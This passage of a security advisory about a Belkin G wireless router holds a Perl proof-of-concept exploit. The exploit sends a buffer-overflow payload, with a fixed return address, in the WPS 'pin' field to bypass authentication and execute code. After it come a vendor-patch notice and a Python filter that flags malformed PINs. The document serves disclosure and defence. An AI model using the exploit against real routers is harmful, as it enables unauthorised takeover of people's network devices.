4 G Wireless Router Authentication Bypass and Remote Code Execution Vulnerability (2)

my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC  -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;

$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
{
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
    print "[-] Done! \\m/\n";
}

}

sub Welcome()
{
  print "\n\n+------------------------------------------+\n";
  print "|  Belkin G Wireless Router Remote Exploit |\n";
  print "|    (Authentication bypass & RCE PoC)    |\n";
  print "+------------------------------------------+\n";
  print "[+] By Aodrulez.\n";
  print "\n[+] Usage  : perl $0 router_ip";
  print "\n[!] Example : perl $0 X.X.X.X";

  if (!$ARGV[0])
  {
    print "\n[-] (o_0) Seriously??\n";
    exit;
  }

  $ip=$ARGV[0];
  print "\n[+] Target IP : $ip\n";

}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.

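Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Belkin
------
The vendor has not yet released a patch or upgrade for this issue. Users of this software are advised to check the vendor's home page regularly for the latest version: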

?rnId=306
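
With no vendor patch available, requests to the affected CGI can be screened at a proxy or IDS. The following is an added example, not part of the original advisory or the PoC: it flags POSTs to wireless_WPS_Enroll.exe whose pin field is not a well-formed WPS PIN. It assumes a valid PIN is 4 or 8 decimal digits (8-digit PINs carry a check digit); the function names and sample records are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

WPS_ENROLL_PATH = "/cgi-bin/wireless_WPS_Enroll.exe"  # path used by the PoC above
PIN_RE = re.compile(rb"\A(?:\d{4}|\d{8})\Z")  # assumption: PIN is 4 or 8 digits

def wps_checksum_ok(pin8: bytes) -> bool:
    """Validate the check digit (last digit) of an 8-digit WPS PIN."""
    digits = [c - 48 for c in pin8]
    accum = 3 * sum(digits[0:7:2]) + sum(digits[1:7:2])
    return (10 - accum % 10) % 10 == digits[7]

def pin_field(body: bytes):
    """Return the percent-decoded 'pin' form field, or None if absent."""
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        if unquote_to_bytes(name.replace(b"+", b" ")) == b"pin":
            return unquote_to_bytes(value.replace(b"+", b" "))
    return None

def classify(method: str, path: str, body: bytes) -> str:
    """Classify one HTTP request seen in front of the router."""
    if method.upper() != "POST" or path.split("?", 1)[0] != WPS_ENROLL_PATH:
        return "ignored"
    pin = pin_field(body)
    if pin is None:
        return "ignored"
    if not PIN_RE.match(pin):
        # Over-long or non-numeric value: never a legitimate WPS PIN.
        return f"alert: malformed pin ({len(pin)} bytes)"
    if len(pin) == 8 and not wps_checksum_ok(pin):
        return "warn: bad WPS check digit"
    return "ok"

# Constructed sample records (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", WPS_ENROLL_PATH, b"pin=12345670"),
    ("POST", WPS_ENROLL_PATH, b"pin=12345678"),
    ("POST", WPS_ENROLL_PATH, b"pin=" + b"A" * 44),
    ("POST", WPS_ENROLL_PATH, b"pin=1234%41%42%43%44"),
    ("GET", "/index.htm", b""),
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec[1], "->", classify(*rec))
```

Decoding the field before matching matters: a percent-encoded value can be 8 characters of non-digits on the wire and would pass a naive length check.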
